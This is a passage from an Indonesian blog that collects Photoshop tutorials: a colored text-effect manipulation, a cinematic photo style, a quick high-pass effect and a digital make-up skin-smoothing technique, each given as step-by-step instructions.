membuat manipulasi foto disertai efek teks berwarna

Langkah 13

Berikutnya, kita perlu menambahkan banyak kata. Klik dan geser untuk membuat sebuah kotak teks. Anda bisa saja menggunakan kata-kata acak seperti lorem ipsum tapi saya lebih suka menggunakan teks betulan agar yang melihat punya sesuatu untuk dibaca. Karena gambar ini terinspirasi dari perang, saya pergi ke wikipedia edisi inggris dan membuka artikel tentang perang dunia. Saya copy artikel tertulis di sana. Kemudian, saya paste semua beberapa kali ke dalam teks box. Saya menggunakan alignment justify untuk memastikan bahwa teks muat dengan tepat ke dalam text box. Gunakan ukuran teks sangat kecil seperti 5 atau 6.
membuat manipulasi foto disertai efek teks berwarna

Langkah 14

Turunkan opacity ke 25%.
membuat manipulasi foto disertai efek teks berwarna

Langkah 15

Tahan Shift + Ctrl lalu klik semua thumbnail layer kata-kata besar yang tadi kita buat. Segera, Anda akan menghasilkan seleksi berbentuk sepertinya.
membuat manipulasi foto disertai efek teks berwarna

Langkah 16

Gandakan teks-teks kecil dengan menggesernya ke atas ikon new layer. Kembalikan opacity layer ke 100%. Click Add Layer Mask icon.
membuat manipulasi foto disertai efek teks berwarna

Langkah 17

Klik ikon mata di depan group teks. Teks besar menghilang tapi kita masih melihat teks-teks kecil muncu dan membetuk kata yang sama.
membuat manipulasi foto disertai efek teks berwarna

Langkah 18

Buat layer baru di atas teks yang lebih kecil. Dengan tool lasso buat seleksi mengelilingi W. Isi seleksi ini dengan warna apa pun yang Anda suka.
membuat manipulasi foto disertai efek teks berwarna

Langkah 19

Klik Layer > Create Clipping Mask. Ini akan memotong warna yang tadi kita buat dan memasukkannya ke dalam teks. Unik bukan?
membuat manipulasi foto disertai efek teks berwarna

Langkah 20

Ulangi langkah 18 dan 19 ke huruf-huruf yang lain. Ini yang saya peroleh sekarang.
membuat manipulasi foto disertai efek teks berwarna

Hasil Akhir

Akhirnya teks sudah selesai dan kita tinggal mengaktifkan kembali layer-layer tersembunyi dengan klik ikon mata di depannya. Saya harap Anda menikmati tutorial ini sebagaimana saya menikmati proses pembuatannya. Jangan lupa untuk menuliskan komentar Anda di bawah!
membuat manipulasi foto disertai efek teks berwarna

Download Wallpaper dan File PSD

Download Wallpaper dan File PSD

FOTO BERGAYA CINEMA (PHOTOSHOP TUTORIAL)

| 0 komentar
photoshop tutorialAda banyak sekali tehnik editing foto pada Photoshop, dan kesemua tehnik tersebut bisa digunakan untuk membentuk sebuah gaya tertentu pada foto. Tentunya, tehnik yang akan digunakan akan sangat bergantung kepada hasil akhir yang ingin dicapai. Pada tutorial kali ini kita akan mencoba membentuk sebuah foto bergaya cinematik dari foto yang biasa-biasa saja. Dan korban yang akan kita permak kali ini adalah..*..eng-ing-eng..* Alyssa soebandono!
haha..berlebihankah diriku??

Hmm..foto ini saya ambil langsung dari blognya si Alyssa yang katanya artis itu. Bukan membajak, karna udah minta ijin dulu di postingannya dia..meskipun blom dikasih ijin. :D

ok, langsung aja..tanpa basa-basi kita mulai tutorialnya..(lha itu yg diatas bukannya basa-basi!?)

step satoe : File>Open (Ctrl + O), pilih gambar yang mau dicinematikkan (duuh..bahasanya!).

photoshop tutorial
step dua : Klik pada layer background, kemudian drag ke ikon Create a New Layer di bagian bawah pada tab Layer. Langkah ini kita gunakan untuk menduplikasi layer. Bisa juga dilakukan dengan klik kanan pada layer, kemudian pilih Duplicate Layer. Langkah ini kita gunakan hanya sebagai perbandingan untuk melihat sejauh mana perbedaan layer yang telah dimanipulasi dengan objek aslinya. Setelah selesai, klik pada ikon bergambar mata pada layer background agar tidak terlihat, sehingga yang tersisa hanya layer background copy hasil duplikasi tadi.

photoshop tutorial
step tiga : Pilih layer background copy. Pada Menu, klik Image>Adjustment>Hue/Saturation. akan terpampang window baru di area kerja photoshop, set besar saturation menjadi -50. kemudian klik Ok.

photoshop tutorial
step empat : Pilih Image>Adjustment>Exposure. pada window Exposure, set nilai Exposure = +0.97, Offset = -0.0490, dan Gamma Correction sebesar = 0.78. Kemudian klik Ok.

photoshop tutorial
step lima : Duplikat lagi Background Copy, lakukan seperti yang telah dijelaskan pada step dua, sehingga menciptakan sebuah layer baru bernama Background Copy 2

photoshop tutorial
step enam : pilih layer background copy 2, kemudian pada Menu, pilih Filter>Blur>Lens Blur. Pada window Lens Blur, set nilai Radius seperti pada gambar dibawah ini, langkah ini dilakukan untuk memberikan kesan blur yang secukupnya pada gambar.

photoshop tutorial
step toejoeh : Pilih layer Background copy 2 dan klik pada ikon Add Layer Mask.

photoshop tutorial
step delapan : klik pada kotak putih di layer Background copy 2, kemudian pilih Brush Tool (B) atur nilai hardness pada brush sebesar 20 %, untuk besar brush, sesuaikan dengan gambar dibawah ini. fokuskan ditengah-tengah gambar kemudian klik. Maka kesan blur dibagian tengah akan hilang.

photoshop tutorial
step sembilan : pilih layer background copy, kemudian pada Menu, pilih Layer>Merge Down (Ctrl + E) untuk menggabungkan layer background copy 2 dengan layer background copy.

step sepuluh : Pilih layer background copy (hasil penggabungan tadi) kemudian pada menu, pilih Image>Adjustment>Color Balance. Pada window color balance, centang tanda pada Shadow kemudian set nilai cyan = -60 dan blue = +60. klik Ok.

photoshop tutorial
Daaannn..selesai! inilah hasilnya.. :D

photoshop tutorial
sebagai tambahan, berikan kesan "movie" dengan batas garis hitam di atas dan di bawah gambar. biar keliatan kaya di film beneran. :D

photoshop tutorial
yakk.segitu aja sharing ilmu di gudang suram..
kritik dan saran sangat dinantikan! :D

Photography Effect : Membuat Efek Keren Lagi dalam 1 menit

| 0 komentar
Membuat efek-efek buat foto sebenernya gak susah.. saya nemu membuat efek dari foto yang keliatan nya biasa menjadi foto yang lumayan keren.. hanya dengan 1 menit sajah.. beneran !
Oia… Sekali lagi… saya pake adobe photoshop CS 3 yah… jadi jangan ada yang nanya lagi yah..  saya pake photoshop versi berapa :)
Langsung aja tanpa basa basi …
Buka foto yang mau diedit..

Duplikat layer background dengan menekan ctrl+J

Klik Filter > Other > High Pass

Ganti layer effect menjadi Vivid Light..

Gambar sekarang keliatan sedikit lebih tajam dan mendetail..
Klik Add New Fill or Adjusment Layer > Gradient Map

Otomatis akan terbentuk layer baru di atas layer hasil duplikat tadi.
Gradient Map yang dipake dari hitam ke putih

Duplikat lagi layer background dengan menekan CTRL + J lalu pindahkan layer hasil duplikat ke paling atas

Klik Image > adjustment layer > Shadow/Highlight

Terakhir Layer Effect ganti menjadi Overlay dan opacity jadi 80%..
hasilnya :

Kita lihat perbedaan sebelum dan sesudah  :

Selamat mencoba !

Digital Make Up Menghaluskan Kulit

| 0 komentar
Bertepatan dengan hari Kartini yaitu 21 April mungkin inilah seri tutorial yang ditunggu - tunggu para penggemar Photoshop, Fotografer, tukang Edit foto dll yaitu Seri Tutorial Digital Make Up. bagi yang belum tahu apa itu Digital Make Up adalah tehnik make over foto yang biasa menjadi luar biasa seperti habis diMake up. Pada Tutorial Photoshop kali ini saya akan mencoba membagikan bagaimana cara melakukan Makeover kulit (Menghaluskan Kulit) terutama wajah jadi kesannya seperti di kasih bedak (Make Up) secara digital menggunakan Adobe Photoshop CS, mari kita praktikkan Teknik Make Up untuk Kulit

1. Buka Photoshop, disini saya menggunakan Photoshop CS3, namun tutorial ini bisa dipraktekkan juga di photoshop CS4 maupun CS5 bahkan CS6 beta
Caranya: Start >> All Program >> Adobe Photoshop CS3

2. Buka / Masukkan foto yang ingin kita haluskan kulitnya (make over)
Disini saya menggunakan Foto Tetangga saya, (tetangga jauh) hehehe...
memperhalus wajah
intermezzo: belum di make over aja dah manis :) ! Eits, yo, fokus kembali ke tutorial ayo (^_^>c^_^)

2. Tekan CRTL + J untuk menggandakan Layer

3. Saatnya memberikan efek Surface Blur
Caranya: Klik Filter > Blur > Surface Blur
property of ilmugrafis
jangan terpaku pada setting di atas hanya sebagai contoh, Gunakan sense of design anda
(disini saya memakai Radius 13 dan Threshold 14 karena saya suka make up yang minimalis)

Radius : menentukan ukuran area sampel untuk blur.

Threshold : mengontrol berapa banyak nilai-nilai tonal piksel di sampingnya harus menyimpang dari nilai pixel pusat sebelum menjadi bagian dari blur.
Piksel dengan perbedaan nilai kurang dari nilai Threshold tidak akan diblur.

4. Sekarang saatnya menambahkan Layer Mask
Layer mask disini fungsinya untuk menyembunyikan bagian layer pada Foto yang tidak diinginkan
Caranya: Klik Layer Mask (vector Mask)
property of ilmugrafis
Letaknya di sebelah kanan Fx

5. Klik Layer 1 (A) Lalu klik brush tool (B)
property of ilmugrafis

6. Pada Properties bar di sebelah atas, Dimana itu properties bar? belum tahu maka klik Gambar Layout Photoshop
property of ilmugrafis
Klik panah kecil agar muncul dropdown properties dari brush

7. Sekarang tekan (tombol D) pada keyboard untuk menresset background dan foreground, setelah itu tekan ( tombol X )
Ok, mari kita sapukan brush pada bagian yg lain (selain kulit) agar kesan naturalnya tidak hilang
property of ilmugrafis
Disini saya menyapukan ke area rambut, tapi gambar di atas (abu - abu) hanya ilustrasi saja.
Setelah selesai maka akan terlihat area kulit lebih mulus, nah klo kurang natural tinggal diturunkan saja opacity dan fill nya sehingga hasilnya bagus dan natural ala Salon Kecantikan

Pada kenyataanya nanti hasil sapuan kita akan seperti ini:

property of ilmugrafis
Gambar Asli (sebelum diedit)
property of ilmugrafis
Gambar Hasil (setelah di Haluskan Kulitnya)

Hasil Digital Make Up pada Kulit, sampai ketemu di tutorial Digital Make up yang lainnya... :)

Terima kasih, IlmuGrafis "Semoga Bermanfaat" ….
Punya masalah dengan Photoshop cek Kumpulan Tutorial, Video Tutorial atau silahkan kontak ke ILMUGRAFIS
Terima kasih, Semoga bermanfaat

Sumber : http://www.ilmugrafis.com/ 

Followers